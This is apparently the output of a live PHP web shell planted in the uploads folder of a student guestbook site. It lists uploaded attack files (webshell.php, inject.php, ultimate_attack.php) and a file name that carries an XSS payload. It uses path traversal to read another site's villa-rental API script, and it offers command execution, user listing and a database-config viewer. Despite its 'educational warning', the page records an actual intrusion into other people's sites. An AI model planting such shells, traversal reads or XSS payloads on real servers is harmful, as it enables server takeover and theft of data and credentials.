🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../584683.klas4s23.mid-ica.nl/public_html/../public_html/../public_html/WI/js/api.js

class Requests {
    static get address() {
        return 'http://87.106.224.51:3010/api';
    }

    // internal function to send a request
    static async Sendrequest(method, endpoint, body, requiresAuth) {
        return new Promise((resolve, reject) => {
            const xhr = new XMLHttpRequest();
            xhr.open(method, endpoint);

            // Remove the Content-Type header for FormData
            if (!(body instanceof FormData)) {
                xhr.setRequestHeader("Content-Type", "application/json");
            }

            if (requiresAuth) {
                const sessionKey = sessionStorage.getItem("SessionKey");
                if (sessionKey) {
                    xhr.setRequestHeader("Authorization", `Bearer ${sessionKey}`);
                } else {
                    reject("No session key found. Please log in.");

                    return;
                }
            }

            xhr.onload = () => resolve(JSON.parse(xhr.responseText));
            xhr.onerror = () => reject(xhr.statusText);

            xhr.send(body instanceof FormData ? body : JSON.stringify(body));
        });
    }


    // public function to send a request handling errors
    static async request(method, endpoint, body, requiresAuth = false) {
        try {
            return await this.Sendrequest(method, endpoint, body, requiresAuth);
        }
        catch (error) {
            console.error(error);

            return { success: false, data: { Reason: error } };
        }
    }
}

class VillaRequests extends Requests {
    static get address() {
        return super.address + '/villa';
    }

    static async getVillas() {
        return await this.request('GET', `${this.address}/get-all`);
    }

    static async getAdminVillas() {
        return await this.request('GET', `${this.address}/get-all-admin`, {}, true);
    }

    static async getVillasByIDs(ids) {
        return await this.request('POST', `${this.address}/get-by-ids`, ids);
    }

    static async getVillaByID(id) {
        return await this.request('POST', `${this.address}/get-by-id`, id);
    }

    static async getVillaByIDEdit(id) {
        return await this.request('POST', `${this.address}/get-by-id-edit`, id, true);
    }

    static async getTags() {
        return await this.request('GET', `${this.address}/get-tags`);
    }

    static async getVillasByFilters(filters) {
        return await this.request('POST', `${this.address}/get-by-filters`, filters);
    }

    static async deleteVilla(id) {
        return await this.request('POST', `${this.address}/delete`, id, true);
    }

    static async deleteRequest(villaID, RequestID) {
        return await this.request('POST', `${this.address}/delete-request`, { villaID, RequestID }, true);
    }
    static async getFirstVillas(count) {
        return await this.request('POST', `${this.address}/get-first`, count);
    }
}


class AdminRequest extends Requests {
    static get address() {
        return super.address + '/admin';
    }

    static async login(email, password) {
        return await this.request('POST', `${this.address}/login`, { email, password });
    }

    static async IsLoggedIn() {
        return await this.request('GET', `${this.address}/is-allowed`, {}, true);
    }

    static async addVilla(data) {
        return await this.request('POST', `${this.address}/upload-villa`, data, true);
    }
    static async editVilla(data) {
        return await this.request('POST', `${this.address}/edit-villa`, data, true);
    }
}

class MoreInfoRequest extends Requests {
    static get address() {
        return super.address + '/moreInfoRequest';
    }

    static async requestMoreInfo(villaId, email, message) {
        return await this.request('POST', `${this.address}/moreInfoRequest`, { villaId, email, message });
    }
}

class PDFRequests extends Requests {
    static get address() {
        return super.address + '/pdf';
    }

    static async generatePDF(VillaID) {
        return await this.request('POST', `${this.address}/get`, VillaID);
    }
}


class ImageServer {
    static get address() {
        return 'http://87.106.224.51:3012/Images';
    }

    static get Logo() {
        return `${this.address}/General/logo.png`;
    }
}

// models
class SmallVilla {
    constructor(villa) {
        this.id = villa.VillaID;
        this.name = villa.Name;
        this.price = villa.Price;
        this.image = villa.VillaImagePath;
        this.location = villa.Location;
        this.capacity = villa.Capacity;
        this.bedrooms = villa.Bedrooms;
        this.bathrooms = villa.Bathrooms;
    }

    get html() {
        return `
        <div class="villaCard">
            <div class="imageContainer">
                <img src="${this.image}" alt="Villa">
            </div>
            <div class="info">
                <div class="title">
                    <h2>${this.name}</h2>
                </div>
                <div class="details">
                    <p>${this.location}</p>
                    <p><img src="Assets/icons/personIcon.svg" alt="Person icon">${this.capacity} personen</p>
                    <p><img src="Assets/icons/bedIcon.svg" alt="Bed icon">${this.bedrooms} Slaapkamers</p>
                    <p><img src="Assets/icons/bathIcon.svg" alt="Bath icon">${this.bathrooms} Badkamers</p>
                </div>
                <div class="actions">
                    <h3 id="price">€${this.price},-</h3>
                    <a href="villa.html?villaID=${this.id}" class="buttonLink">Bekijk</a>
                </div>
            </div>
        </div>`;
    }
}

let logos = document.getElementsByClassName('logo');

for (let i = 0; i < logos.length; i++) {
    logos[i].src = ImageServer.Logo;
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!